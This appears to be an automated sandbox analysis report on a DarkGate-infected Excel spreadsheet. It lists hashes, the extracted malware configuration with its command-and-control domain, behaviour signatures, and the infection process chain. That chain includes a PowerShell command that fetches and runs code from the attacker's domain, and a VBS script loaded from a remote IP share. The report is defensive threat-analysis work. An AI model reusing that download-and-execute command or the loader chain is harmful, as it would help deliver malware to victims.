Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
134s -
max time network
144s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
28/02/2024, 21:20
Static task
static1
Behavioral task
behavioral1
Sample
scan-28-02-24_4761.xlsx
Resource
win10-20240221-en
General
-
Target
scan-28-02-24_4761.xlsx
-
Size
29KB
-
MD5
78d125fd15824e5ca1a3f7d99d7d8e54
-
SHA1
e905149cd68a5961ee9fb4760c29f17b3fa6b524
-
SHA256
535dd498b529c109d05d517f329897f64fd15ea57f841f4deb111262b011fc60
-
SHA512
266620784bb52ebbec6e533ca306bca8f753b311a6a76dcd3759e0614bf6f64dc124363b747fbfecc09fab3edd4da2c4e0908ae9a04a67c5438e6a0bbba63fd3
-
SSDEEP
768:wnEQpllh7tAafroiianGoHoJ+yWWn0Wht3p1:nQJh7Lro4ntD+0AZ1
Malware Config
Extracted
darkgate
admin888
cayennesxque.boo
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
true
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
ekoRFSqn
-
minimum_disk
50
-
minimum_ram
7000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral1/memory/2848-257-0x0000000005840000-0x0000000005B8F000-memory.dmp family_darkgate_v6 behavioral1/memory/2848-258-0x0000000005840000-0x0000000005B8F000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1640 1328 WScript.exe 72 -
Blocklisted process makes network request 4 IoCs
flow pid Process 29 1976 powershell.exe 31 1976 powershell.exe 32 1976 powershell.exe 33 1976 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2848 AutoIt3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1328 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1976 powershell.exe 1976 powershell.exe 1976 powershell.exe 1976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1976 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1328 EXCEL.EXE 1328 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE 1328 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1328 wrote to memory of 1640 1328 EXCEL.EXE 76 PID 1328 wrote to memory of 1640 1328 EXCEL.EXE 76 PID 1640 wrote to memory of 1976 1640 WScript.exe 77 PID 1640 wrote to memory of 1976 1640 WScript.exe 77 PID 1976 wrote to memory of 2848 1976 powershell.exe 79 PID 1976 wrote to memory of 2848 1976 powershell.exe 79 PID 1976 wrote to memory of 2848 1976 powershell.exe 79
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_4761.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/qdfjfvph')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\temp\AutoIt3.exe"C:\temp\AutoIt3.exe" script.a3x4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2848
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
468KB
MD55dc0a5b884e44209941ec370406fbcc5
SHA1b06cf5d11a5a7252afff61c1a787fb27ff126e28
SHA25668acdae5c94dcfc0adaa1e1965166b3d2b4b8f1f889bce4610dbd1a0b72e2bc9
SHA5120e11e3281175b0c9bdbe2474830fcd38de05e18e6edac4c1b0cd9c334ced89738c2eaf1bdf90c5e6b08c20faf96a6bdd574a472f81bc84355b69fc60832cbb53
-
Filesize
76B
MD58b428b9d5c33c6ed79386d4c10600cd8
SHA10f4bbafe0abe6cf3f3542d49a9eed5db84f9ef7e
SHA256424ef27370eb401871db935fc3fa3811179f5786fe777182550299aa8230f6b6
SHA512307e7d4228577259a4cc3874da09408e45401b46739ccaa96e0bd5a0f6aedb362dd97528aa2acc79d3698710d85c283afd0649ec412dcba8c9f8df1339e3b892